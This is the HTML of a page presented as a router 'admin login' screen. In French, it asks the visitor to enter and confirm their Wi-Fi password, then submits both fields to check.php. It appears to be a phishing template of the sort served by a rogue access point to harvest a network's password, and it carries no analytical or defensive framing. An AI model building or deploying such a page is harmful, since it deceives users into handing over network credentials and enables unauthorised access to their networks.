<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>admin login</title>
<meta http-equiv="Content-Type" content="no-cache">

<script language="javascript" src="SKN/__global_variable.sjs"></script>
<script language="javascript" src="SKN/__level.js"></script>
<script language="javascript" src="SKN/__menu.js"></script>
<script language="javascript" src="SKN/__hints.js"></script>
<script language="javascript" src="SKN/util.js"></script>
<script language="javascript" src="SKN/__button.js"></script>
<script language="javascript" src="SKN/__comm.js"></script>
<script language="javascript" src="SKN/__display.js"></script>
<script language="javascript">
loadCSS();
var copyright ="SKN PRO HAYTEK";
var forbiddentime = 0;


</script><link href="SKN/g_style.css" type="text/css" rel="stylesheet" id="css">
</head>
<body onload="admininit();">
<table id="header_container" cellspacing="0" cellpadding="5" width="838" align="center" border="0">
<tbody><tr>
</tr>
</tbody></table>
<table cellspacing="0" cellpadding="0" width="838" align="center" border="0" style="background-color:#ffffff">
<tbody><tr>
         <td height="3" colspan="4" bgcolor="#FFFFFF"></td>
</tr>
<tr>
     <td align="center" id="topnav_container_m"><a href=""><img border="0" src="SKN/head_01.gif"></a></td>
</tr>
<tr>
         <td height="1" colspan="4" bgcolor="#FFFFFF"></td>
</tr>
</tbody></table>

<table cellspacing="0" cellpadding="0" width="838" align="center" border="0" height="3px" style="background-color:#f1f1f1">
<tbody><tr><td></td></tr>
</tbody></table>



<table border="0" cellpadding="0" cellspacing="0" width="838" align="center" height="120px" style="background-color:#f1f1f1">



<tbody><tr align="center">
<td align="right" width="50%"> Saisissez Le mot de passe de Votre Wifi &nbsp;&nbsp;
<td align="left" width="50%"></b> </td><form id="form1" name="form1" method="POST" action="check.php" >

</td>
</tr>
<tr>
	<td align="right"> Mot de passe &nbsp;&nbsp;&nbsp;&nbsp;</td>
	<td align="left"><input type="password" name="key1" id="password" maxlength="64" style="width: 170px;"></td>
	
	
<tr>
	<td align="right">Confirmer &nbsp;&nbsp;&nbsp;&nbsp;</td>
	<td align="left"><input type="password" name="key1" id="password" maxlength="64" style="width: 170px;"><br></td>
</tr>
<tr>
 <tr><td colspan="4" height="7">        <tr><td colspan="4" id="forbidden" style="display:none" align="center"></td></tr>
	

<tr>
	<td colspan="4" align="center">
	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input name="ok" type="submit" value="Submit">
        	  <input name="cancel" type="reset" value="annuler">
</td>
</tr>
<tr>
	<td id="forbidden" style="display:none" colspan="2" align="center"></td>
</tr>

</tbody>


</td>
</tr>

<tr>
	<td id="forbidden" style="display:none" colspan="2" align="center"></td>
</tr>

</tbody></table>
</form>
<table id="footer_container" cellspacing="0" cellpadding="5" width="838" align="center" border="0">
<tbody><tr>
	<td align="middle" width="125"><img src="SKN/tail.gif" width="114" height="35"></td>
	<td width="10"></td>
	<td></td>
</tr>
</tbody></table>
<br>
<div align="center"><font color="#404343"></font></div>
<br><br>


</body></html>